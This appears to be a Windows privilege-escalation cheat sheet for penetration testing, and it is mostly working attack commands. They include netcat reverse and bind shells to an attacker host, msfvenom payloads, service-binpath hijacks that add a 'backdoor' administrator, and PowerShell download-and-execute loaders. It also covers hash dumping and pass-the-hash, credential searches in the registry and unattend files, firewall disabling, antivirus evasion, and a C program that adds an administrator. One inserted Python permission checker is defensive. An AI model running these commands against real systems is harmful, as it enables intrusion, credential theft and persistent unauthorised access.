Windows

Windows Privilege Escalation Examples

https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/privilege-escalation/windows/windows-examples.rst

MindMap

https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md

Windows Kernel Sploit List

https://github.com/njahrckstr/Windows_Kernel_Sploit_List

Videos

Use rlwrap to improve the Windows shell:
    rlwrap nc -lnvp 443

Useful commands

http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
https://github.com/emilyanncr/Windows-Post-Exploitation

Credential reuse

https://recipeforroot.com/windows-password-scouting/

Sometimes a user whose credentials you have is also the administrator on the system, but uses the same password for both accounts. So never forget to try known passwords when you have the chance. Just don't overdo it: too many attempts will trigger a lockout mechanism and get you detected.

Try the obvious first. Maybe the user is SYSTEM or is already part of the Administrators group. As you can see from the output of the three commands below, the username is hacker and he is part of the Administrators group. In this case, a privilege escalation is not necessary because we are already in the administrators group!
    whoami
    net localgroup administrators
    net user "%username%"

Getting a shell in limited interpreters:
    system("start cmd.exe /k $cmd")

Bind cmd to a port:
    nc.exe -Lp 31337 -vv -e cmd.exe

Reverse shell:
    nc.exe attacker_ip attacker_port -e cmd.exe

To capture NTLM hash

https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/

Spin up smbserver.py and connect via SMB to your server on Kali, i.e. smbclient -L //$kali$ip:
    /usr/share/doc/python-impacket/examples/smbserver.py -smb2support test .
    Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

    [*] Config file parsed
    [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
    [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
    [*] Config file parsed
    [*] Config file parsed
    [*] Config file parsed
    [*] Incoming connection (victimip:port)
    [*] AUTHENTICATE_MESSAGE (MicrosoftAccount\[email protected],DESKTOP-12345A)
    [*] User [email protected]\DESKTOP-123456A authenticated successfully
    [*][email protected]::MicrosoftAccount:aad3c435b514a4eeaad3b935b51304fec46b9e58:aad3c435b514a4eeaad3b935b51304fec46b9e58:aad3c435b514a4eeaad3b935b51304fec46b9e58

System info

Finding installed software, running processes, bound ports, and the OS version might be critical to identify the right EoP vector.

Find installed patches, architecture, OS version:
    systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Get exact OS version:
    type C:/Windows/system32/eula.txt

Hotfix(s): N/A - if there are no hotfixes listed, it is likely the system is vulnerable to a kernel exploit.

Hostname and environment variables (COMPUTERNAME is included in the output):
    set

List open connections:
    netstat -aton

Network information:
    ipconfig /all & route print & arp -a

Information about users and administrators

Find current user:
    echo %username%
    getuid (in meterpreter)

List all users:
    net users

Firewall information:
    netsh firewall show state
    netsh firewall show config

List scheduled tasks:
    schtasks /query /fo LIST /v

List Windows services:
    net start
    wmic service list brief

Link running processes to started services:
    tasklist /SVC

Incorrect permissions in services

A service running as Administrator/SYSTEM with incorrect file permissions might allow PE. You can replace the binary, restart the service and get SYSTEM.

We are interested in services where the permissions are BUILTIN\Users with (F), (C) or (M) for our group. More info about permissions:

https://msdn.microsoft.com/en-us/library/bb727008.aspx

Common exploitation payloads involve replacing the affected binary with a reverse shell, or with a command that creates a new user and adds it to the Administrators group. Replace the affected service binary with your payload and restart the service by running one of:
    wmic service NAMEOFSERVICE call startservice
    net stop [service name] && net start [service name]
    sc stop serviceName
    sc start serviceName

Obtain the permission string of all services

    sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul

The following commands will print the affected services:
    for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
    for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"

If wmic is not available we can use sc.exe:
    sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
    FOR /F %i in (Servicenames.txt) DO echo %i
    type Servicenames.txt
    FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
    FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

You can also manually check each service binary using cacls:
    cacls "C:\path\to\file.exe"

If you don't have access to wmic, you can query a single service with sc:
    sc qc upnphost

Windows XP SP1 is known to be vulnerable to PE in upnphost. You get Administrator with:
    sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe YOUR_IP 1234 -e C:\WINDOWS\System32\cmd.exe"
    sc config upnphost obj= ".\LocalSystem" password= ""
    sc qc upnphost

If it fails because of a missing dependency, run the following:
    sc config SSDPSRV start= auto
    net start SSDPSRV
    net start upnphost

Or remove the dependency:
    sc config upnphost depend= ""

Using meterpreter:
    exploit/windows/local/service_permissions

accesschk.exe

If wmic and sc are not available, you can use accesschk. For Windows XP, version 5.2 of accesschk is needed:

https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe

    accesschk.exe -uwcqv "Authenticated Users" * /accepteula
    accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula
    accesschk.exe -qdws Users C:\Windows\

Then query the service using Windows sc:
    sc qc <vulnerable service name>

Then change the binpath to execute your own commands (a restart of the service will most likely be needed):
    sc config <vuln-service> binpath= "net user backdoor backdoor123 /add"
    sc stop <vuln-service>
    sc start <vuln-service>
    sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add"
    sc stop <vuln-service>
    sc start <vuln-service>

Note - you might need to set the depend attribute explicitly:
    sc stop <vuln-service>
    sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= ""
    sc start <vuln-service>

Juicy Potato (abusing the golden privileges)

If you have the SeAssignPrimaryToken or SeImpersonate privilege, you can get SYSTEM.

Vulnerable Windows versions

    Windows 7 Enterprise
    Windows 8.1 Enterprise
    Windows 10 Enterprise
    Windows 10 Professional
    Windows Server 2008 R2 Enterprise
    Windows Server 2012 Datacenter
    Windows Server 2016 Standard

Create the payload:
    msfvenom -p windows/shell_reverse_tcp LHOST=$kaliip LPORT=444 -e x86/shikata_ga_nai -f exe -o rev.exe

Run Juicy Potato:
    JuicyPotato.exe -l 1340 -p C:\users\User\rev.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

Capture the connection:
    rlwrap nc -lnvp 444
    Ncat: Version 7.80 ( https://nmap.org/ncat )
    Ncat: Listening on :::444
    Ncat: Listening on 0.0.0.0:444
    Ncat: Connection from $ip.
    Ncat: Connection from $ip:54805.
    Microsoft Windows [Version 10.0.17134.590]
    (c) 2018 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>

Find unquoted paths

If we find a service running as SYSTEM/Administrator whose binary path is unquoted and contains spaces, we can hijack the path and use it to elevate privileges. This occurs because Windows, for every space in the unquoted path, first looks for an executable named after the part of the path before that space, in the corresponding intermediate folder.

For example, the following path would be vulnerable:
    C:\Program Files\something\winamp.exe

Not vulnerable:
    "C:\Program Files\something\winamp.exe"

Obtain the path of the executable called by a Windows service (good for checking unquoted paths):
    sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul

We could place our payload at any of the following paths:
    C:\winamp.exe (this is a reverse shell with the same name as the legitimate program)

The following command will display affected services:
    wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Check Permissions

We might even be able to overwrite the service executable, so always check the permissions of the service binary and its folder:
    icacls "C:\Program Files (x86)\Program Folder"

You can automate this with meterpreter:
    exploit/windows/local/trusted_service_path
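As an added example (not code from the original cheat sheet), this Python snippet parses the output of `icacls "<path>"` for a service binary and flags ACEs that give a low-privileged principal (Users, Authenticated Users, Everyone) a right that allows replacing the file; it serves both the service-permission check above and the earlier "Incorrect permissions in services" section. The icacls text is a constructed sample and the principal and rights tables are my own assumptions.

```python
"""Flag service binaries writable by low-privileged principals from icacls output.

Added example, not part of the original cheat sheet. The icacls text below is
a constructed sample in the format `icacls "<path>"` prints; no real host was
queried.
"""
import re
from typing import List, Set, Tuple

# Principals that every local user effectively belongs to (assumed list).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# icacls simple rights (F, M, W, D) plus specific rights that let a user
# change or replace the file. cacls prints C (Change) where icacls prints M.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO", "DC"}
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}

# One ACE: "<principal>:(flag)(flag)...", e.g. "BUILTIN\Users:(I)(RX)"
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<perms>(?:\([^)]*\))+)\s*$")

SAMPLE_PATH = r"C:\Program Files\something\winamp.exe"
SAMPLE_ICACLS = r"""C:\Program Files\something\winamp.exe BUILTIN\Administrators:(I)(F)
                                      NT AUTHORITY\SYSTEM:(I)(F)
                                      BUILTIN\Users:(I)(RX)
                                      NT AUTHORITY\Authenticated Users:(I)(M)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(path: str, text: str) -> List[Tuple[str, Set[str]]]:
    """Return (principal, rights) pairs for the single file `path`.

    Assumes `text` is the output of `icacls "<path>"` for exactly that file:
    the first line carries the path followed by the first ACE, the following
    lines are indented ACEs, then a blank line and the summary line.
    """
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully"):
            continue
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised icacls line: {raw!r}")
        rights: Set[str] = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("perms")):
            for token in group.split(","):
                token = token.strip()
                if token and token not in INHERITANCE_FLAGS:
                    rights.add(token)
        aces.append((m.group("who"), rights))
    return aces


def writable_by_low_priv(aces: List[Tuple[str, Set[str]]]) -> List[Tuple[str, Set[str]]]:
    """Return the ACEs that let any authenticated user modify the binary."""
    findings = []
    for who, rights in aces:
        if who.lower() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS:
            findings.append((who, rights & WRITE_RIGHTS))
    return findings


if __name__ == "__main__":
    for who, rights in writable_by_low_priv(parse_icacls(SAMPLE_PATH, SAMPLE_ICACLS)):
        print(f"WEAK: {who} has {sorted(rights)} on {SAMPLE_PATH}")
```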

PowerUp

PowerUp is an extremely useful script for quickly checking for obvious paths to privilege escalation on Windows. It is not an exploit itself, but it can reveal vulnerabilities such as an administrator password stored in the registry and similar. We shamelessly use harmj0y's guide as the reference point for the following guide. Some basic knowledge about how to import PowerShell modules and use them is required.

PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

Import the PowerUp module with the following:
    PS C:\> Import-Module PowerUp.ps1

CanRestart

If the CanRestart option is true, we can restart the service on the system; if the application's directory is also writable, we can replace the legitimate application with our malicious one and restart the service, which will then run our infected program!

Use msfvenom to generate a reverse shell as a Windows executable.

If you want to invoke everything without touching disk, use something like this:
    C:\> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/1mK64oH'); Invoke-AllChecks"

Finding stuff fast

Cleartext passwords (quick hits)

    findstr /s /C:"stringtosearchfor.txt" "C:*"

We might sometimes find passwords in arbitrary files; you can search for them by running:
    findstr /si password *.txt
    findstr /si password *.xml
    findstr /si password *.ini

Find all those strings in config files:
    dir /s *pass* == *cred* == *vnc* == *.config*

Find all passwords in all files:
    findstr /spin "password" *.*

These are common files to find them in. They might be base64-encoded, so look out for that.
    type c:\sysprep.inf
    type c:\sysprep\sysprep.xml
    type c:\unattend.xml
    type %WINDIR%\Panther\Unattend\Unattended.xml
    type %WINDIR%\Panther\Unattended.xml

    dir c:*vnc.ini /s /b
    dir c:*ultravnc.ini /s /b
    dir c:\ /s /b | findstr /si *vnc.ini

Stuff in the registry:
    reg query HKLM /f password /t REG_SZ /s
    reg query HKCU /f password /t REG_SZ /s
    reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
    reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
    reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
    reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

Using meterpreter:
    post/windows/gather/credentials/gpp
    post/windows/gather/enum_unattend

Pass the hash

Pass the hash allows an attacker to authenticate to a remote target by using a valid combination of username and NTLM/LM hash rather than a cleartext password.

Windows hash format:
    user:group:id:ntlmpassword::

You can dump hashes on the affected system by running:
    wce32.exe -w
    wce64.exe -w
    fgdump.exe

Download and run fgdump.exe on the target machine (serve it from Kali with):
    cd /usr/share/windows-binaries/fgdump; python -m SimpleHTTPServer 80

    pth-winexe -U DOMAIN/user%hash //$ip cmd

or:
    export SMBHASH=xxx
    pth-winexe -U user% //$ip cmd

You can also do a "run as" with the hash:

Technique 1:

    C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

Technique 2 (save as r.ps1):

    $secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
    $mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
    $computer = "<hostname>"
    [System.Diagnostics.Process]::Start("C:\users\public\nc.exe", "<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)

    powershell -ExecutionPolicy Bypass -File c:\users\public\r.ps1

Technique 3:

    psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc <attacker_ip> 4444 -e cmd.exe"

Services only available from loopback

You can find services bound to the loopback interface, which are not reachable over the network, by running the following and looking for LISTENING/LISTEN:
    netstat -ano

Port forward using plink:
    plink.exe -l root -pw mysecretpassword 192.168.0.101 -R 8080:127.0.0.1:8080

Port forward using meterpreter:
    portfwd add -l <attacker port> -p <victim port> -r <victim ip>
    portfwd add -l 3306 -p 3306 -r 192.168.1.101

If PowerShell is blocked, you can download:

https://github.com/Ben0xA/nps

Once you know which updates are installed, you can find known exploits using windows-exploit-suggester:
    ./windows-exploit-suggester.py -d 2017-02-09-mssb.xls -p ms16-075
    [*] initiating winsploit version 3.2…
    [*] database file detected as xls or xlsx based on extension
    [*] searching all kb’s for bulletin id MS16-075
    [+] relevant kbs ['3164038', '3163018', '3163017', '3161561']
    [*] done

In March 2017 Microsoft stopped maintaining the security bulletin search. This means the Windows Exploit Suggester database will not include any vulnerabilities or exploits found after that date. Still, this tool can be very useful on older systems.

Compile a Windows exploit on Linux:
    i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe

Compiling Python scripts to executables:
    wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile 18176.py

AlwaysInstallElevated

AlwaysInstallElevated is a setting that allows non-privileged users to run Microsoft Windows Installer package files (MSI) with elevated (SYSTEM) permissions.

Check if these two registry values are set to "1":
    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If they are, create your own malicious MSI:
    msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi

Then use msiexec on the victim to execute your MSI:
    msiexec /quiet /qn /i C:\evil.msi

Metasploit module:
    use exploit/windows/local/always_install_elevated

Windows-privesc-checker2

https://github.com/pentestmonkey/windows-privesc-check/archive/master.zip

Vulnerable drivers

Third-party drivers might contain vulnerabilities; list them by running:
    DRIVERQUERY

Kernel vulnerabilities

Run the exploit suggester against systeminfo:

Don't rely on this - there are a lot of false positives! This is generally a last resort.

https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py

    python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt

Find installed patches:
    wmic qfe get Caption,Description,HotFixID,InstalledOn

Comprehensive tables of vulnerabilities below:

    [+] Windows vulnerabilities:

    Windows XP:
    CVE-2012-4349 Unquoted windows search path - Windows provides the capability of including spaces in path names - can be root
    CVE-2011-1345 Internet Explorer does not properly handle objects in memory - allows remote execution of code via object
    CVE-2010-3138 EXPLOIT-DB 14765 - Untrusted search path vulnerability - allows local users to gain privileges via a Trojan horse
    CVE-2011-5046 EXPLOIT-DB 18275 - GDI in windows does not properly validate user-mode input - allows remote code execution
    CVE-2002-1214 ms02_063_pptp_dos - exploits a kernel based overflow when sending abnormal PPTP Control Data packets - code execution, DoS
    CVE-2003-0352 ms03_026_dcom - exploits a stack buffer overflow in the RPCSS service
    CVE-2003-0533 MS04-011 - ms04_011_lsass - exploits a stack buffer overflow in the LSASS service
    CVE-2003-0719 ms04_011_pct - exploits a buffer overflow in the Microsoft Windows SSL PCT protocol stack - Private communication target overflow
    CVE-2010-3970 ms11_006_createsizeddibsection - exploits a stack-based buffer overflow in thumbnails within .MIC files - code execution
    CVE-2010-3147 EXPLOIT-DB 14745 - Untrusted search path vulnerability in wab.exe - allows local users to gain privileges via a Trojan horse
    CVE-2003-0812 ms03_049_netapi - exploits a stack buffer overflow in the NetApi32
    CVE-2003-0818 ms04_007_killbill - vulnerability in the bit string decoding code in the Microsoft ASN.1 library
    CVE-2003-0822 ms03_051_fp30reg_chunked - exploit for the chunked encoding buffer overflow described in MS03-051
    CVE-2004-0206 ms04_031_netdde - exploits a stack buffer overflow in the NetDDE service

    Windows 7:
    CVE-2014-4114 ms14_060_sandworm - exploits a vulnerability found in Windows Object Linking and Embedding - arbitrary code execution
    CVE-2015-0016 ms15_004_tswbproxy - abuses a process creation policy in Internet Explorer's sandbox - code execution
    CVE-2014-4113 ms14_058_track_popup_menu - exploits a NULL Pointer Dereference in win32k.sys - arbitrary code execution
    CVE-2010-3227 EXPLOIT-DB - Stack-based buffer overflow in the UpdateFrameTitleForDocument method - arbitrary code execution
    CVE-2018-8494 remote code execution vulnerability exists when the Microsoft XML Core Services MSXML parser processes user input
    CVE-2010-2744 EXPLOIT-DB 15894 - kernel-mode drivers in windows do not properly manage a window class - allows privileges escalation
    CVE-2010-0017 ms10_006_negotiate_response_loop - exploits a denial of service flaw in the Microsoft Windows SMB client - DoS
    CVE-2010-0232 ms10_015_kitrap0d - create a new session with SYSTEM privileges via the KiTrap0D exploit
    CVE-2010-2550 ms10_054_queryfs_pool_overflow - exploits a denial of service flaw in the Microsoft Windows SMB service - DoS
    CVE-2010-2568 ms10_046_shortcut_icon_dllloader - exploits a vulnerability in the handling of Windows Shortcut files (.LNK) - run a payload

    Windows 8:
    CVE-2013-0008 ms13_005_hwnd_broadcast - attacker can broadcast commands from lower Integrity Level process to a higher one - privilege escalation
    CVE-2013-1300 ms13_053_schlamperei - kernel pool overflow in Win32k - local privilege escalation
    CVE-2013-3660 ppr_flatten_rec - exploits EPATHOBJ::pprFlattenRec due to the usage of uninitialized data - allows memory corruption
    CVE-2013-3918 ms13_090_cardspacesigninhelper - exploits CardSpaceClaimCollection class from the icardie.dll ActiveX control - code execution
    CVE-2013-7331 ms14_052_xmldom - uses Microsoft XMLDOM object to enumerate a remote machine's filenames
    CVE-2014-6324 ms14_068_kerberos_checksum - exploits the Microsoft Kerberos implementation - privilege escalation
    CVE-2014-6332 ms14_064_ole_code_execution - exploits the Windows OLE Automation array vulnerability
    CVE-2014-6352 ms14_064_packager_python - exploits Windows Object Linking and Embedding (OLE) - arbitrary code execution
    CVE-2015-0002 ntapphelpcachecontrol - NtApphelpCacheControl Improper Authorization Check - privilege escalation

    Windows 10:
    CVE-2015-1769 MS15-085 - Vulnerability in Mount Manager - Could Allow Elevation of Privilege
    CVE-2015-2426 ms15_078_atmfd_bof MS15-078 - exploits a pool based buffer overflow in the atmfd.dll driver
    CVE-2015-2479 MS15-092 - Vulnerabilities in .NET Framework - Allows Elevation of Privilege
    CVE-2015-2513 MS15-098 - Vulnerabilities in Windows Journal - Could Allow Remote Code Execution
    CVE-2015-2423 MS15-088 - Unsafe Command Line Parameter Passing - Could Allow Information Disclosure
    CVE-2015-2431 MS15-080 - Vulnerabilities in Microsoft Graphics Component - Could Allow Remote Code Execution
    CVE-2015-2441 MS15-091 - Vulnerabilities exist when Microsoft Edge improperly accesses objects in memory - allows remote code execution
    CVE-2015-0057 exploits GUI component of Windows namely the scrollbar element - allows complete control of a Windows machine

    Windows Server 2003:
    CVE-2008-4114 ms09_001_write - exploits a denial of service vulnerability in the SRV.SYS driver - DoS
    CVE-2008-4250 ms08_067_netapi - exploits a parsing flaw in the path canonicalization code of NetAPI32.dll - bypassing NX
    CVE-2017-8487 allows an attacker to execute code when a victim opens a specially crafted file - remote code execution

https://github.com/SecWiki/windows-kernel-exploits

Windows version map

    Operating System                 Version Number
    Windows 1.0                      1.04
    Windows 2.0                      2.11
    Windows 3.0                      3
    Windows NT 3.1                   3.10.528
    Windows for Workgroups 3.11      3.11
    Windows NT Workstation 3.5       3.5.807
    Windows NT Workstation 3.51      3.51.1057
    Windows 95                       4.0.950
    Windows NT Workstation 4.0       4.0.1381
    Windows 98                       4.1.1998
    Windows 98 Second Edition        4.1.2222
    Windows Me                       4.90.3000
    Windows 2000 Professional        5.0.2195
    Windows XP                       5.1.2600
    Windows Vista                    6.0.6000
    Windows 7                        6.1.7600
    Windows 8.1                      6.3.9600
    Windows 10                       10.0.10240

Automated tools

PowerSploit

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.

https://github.com/PowerShellMafia/PowerSploit

Useful functions:
    Get-GPPPassword
    Get-UnattendedInstallFile
    Get-Webconfig
    Get-ApplicationHost
    Get-SiteListPassword
    Get-CachedGPPPassword
    Get-RegistryAutoLogon

Reverse shell from Windows

If there is a way to execute code on the Windows host, we can try:
    Uploading ncat and executing it
    PowerShell Empire / Metasploit web delivery method
    Invoke-Shellcode (from PowerSploit), see below

    Powershell.exe -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://YourIPAddress:8000/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost YourIPAddress -Lport 4444 -Force"

Metasploit

    post/windows/gather/credentials/gpp
    post/windows/gather/enum_unattend

    getsystem
    getprivs
    use priv
    hashdump

Metasploit incognito

    use incognito
    list_tokens -u
    list_tokens -g
    impersonate_token DOMAIN_NAME\\USERNAME
    steal_token PID
    drop_token
    rev2self

Useful commands

Add a new user:
    net user test 1234 /add
    net localgroup administrators test /add

Read a file:
    type file

Remove a file:
    del /f file

Change password for a user:
    net user <user> <password>

List users:
    net user

Info about a user:
    net user <username>

Permissions on a folder recursively:
    cacls *.* /t /e /g domainname\administrator:f

Enable RDP access

This is useful to do because it is generally easier to manipulate Windows using the GUI. The downside is that you will most definitely have an impact on the machine, as you may have to create a user or change a user's password to get in.
    reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
    netsh firewall set service remoteadmin enable
    netsh firewall set service remotedesktop enable

Disable firewall:
    netsh firewall set opmode disable

Run exploit:
    C:\tmp>powershell -ExecutionPolicy ByPass -command "& { . C:\tmp\Invoke-MS16-032.ps1; Invoke-MS16-032 }"

JAWS

https://411hall.github.io/JAWS-Enumeration/

Metasploit

Module to elevate privileges to SYSTEM by creating a service or hijacking existing ones with incorrect permissions:
    exploit/windows/local/service_permissions

Other scripts

https://github.com/GDSSecurity/Windows-Exploit-Suggester
https://github.com/Jean13/Penetration_Testing/blob/master/Privilege_Escalation/windows-privesc-check2.exe

GDSSecurity's Windows-Exploit-Suggester worked excellently for operating systems of the Windows XP and Windows Vista era, but it does not work for operating systems like Windows 10 and for vulnerabilities published in recent years. This is because Microsoft replaced the Microsoft Security Bulletin Data Excel file [1], on which GDSSecurity's Windows-Exploit-Suggester is fully dependent, by the MSRC API [2]. The Microsoft Security Bulletin Data Excel file has not been updated since Q1 2017, so later operating systems and vulnerabilities cannot be detected. Thanks @gdssecurity for this great tool, which has served many of us for so many years!

https://github.com/bitsadmin/wesng.git

Useful exploits

Automatically download and compile exploits:
    wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py

    USAGE: xploit_installer.py <exploit id>

Windows remote exploits:
    0: windows_exploit_suggester
    1: ms03-026
    2: ms03-039 (1)
    3: ms03-039 (2)
    4: *ms03-049
    5: ms04-007
    6: ms04-011 - ssl bof
    7: ms04-011 - lsasarv.dll
    8: ms04-031
    9: ms05-017
    10: ms05-039
    11: *ms06-040 (1)
    12: ms06-040 (2)
    13: ms06-070
    14: *ms08-067 (1)
    15: ms08-067 (2)
    16: ms08-067 (3)
    17: *ms09-050

Windows local exploits:
    18: windows-privesc-check
    19: ms04-011
    20: ms04-019 (1)
    21: ms04-019 (2)
    22: ms04-019 (3)
    23: ms04-020
    24: *keybd_event
    25: *ms05-018
    26: *ms05-055
    27: ms06-030
    28: ms06-049
    29: print spool service
    30: *ms08-025
    31: netdde
    32: ms10-015
    33: ms10-059
    34: ms10-092
    35: ms11-080
    36: ms14-040
    37: *ms14-058 (1)
    38: ms14-058 (2)
    39: *ms14-070 (1)
    40: ms14-070 (2)
    41: *ms15-010 (1)
    42: *ms15-010 (2)
    43: ms15-051
    44: *ms16-014
    45: ms16-016
    46: ms16-032

Check out:
http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation

Windows Server 2003 and IIS 6.0 privilege escalation using impersonation:

https://www.exploit-db.com/exploits/6705/
https://github.com/Re4son/Churrasco

    c:\Inetpub>churrasco
    churrasco
    /churrasco/-->Usage: Churrasco.exe [-d] "command to run"

    c:\Inetpub>churrasco -d "net user /add <username> <password>"
    c:\Inetpub>churrasco -d "net localgroup administrators <username> /add"

Windows MS11-080

http://www.exploit-db.com/exploits/18176/
    python pyinstaller.py --onefile ms11-080.py
    ms11-080.exe -O XP

From admin to SYSTEM:
    psexec.exe -i -s %SystemRoot%\system32\cmd.exe

https://github.com/Cn33liz/EasySystem

AV bypass

Generating a mutated binary to bypass antivirus:
    wine hyperion.exe ../backdoor.exe ../backdoor_mutation.exe

Access Check

You will probably need to accept the EULA first:
    accesschk.exe /accepteula

Windows hashes

If you capture a hash, put it into Google: someone might have cracked it before.

NTLM and LM passwords are located in the SAM file in C:\Windows\SYSTEM32\CONFIG.

LAN Manager (LM): Windows XP and prior use the LAN Manager protocol. It uses DES, but the key space is small (uppercase only, not salted, 14 chars or padded to 14).

NTLM/NTLM2: it does not split the password; also stored in uppercase.

Kerberos: default protocol for Active Directory environments.

PoCs

Add user to administrator group (compiled with the mingw command below):
    #include <stdlib.h>

    /* Runs the command with the privileges of whatever executes this binary,
       e.g. a SYSTEM service whose executable was replaced by it. */
    int main(void)
    {
        system("net localgroup administrators theusername /add");
        return 0;
    }

    i686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe

Run an arbitrary command:
    echo -e '#include <stdio.h>\n#include <stdlib.h>\nint main () {\nsystem("C:\\Users\\Administrator\\Desktop\\nc -lvp 4313 -e cmd.exe");\nreturn(0);\n}' > poc.c

Print proof:
    echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt"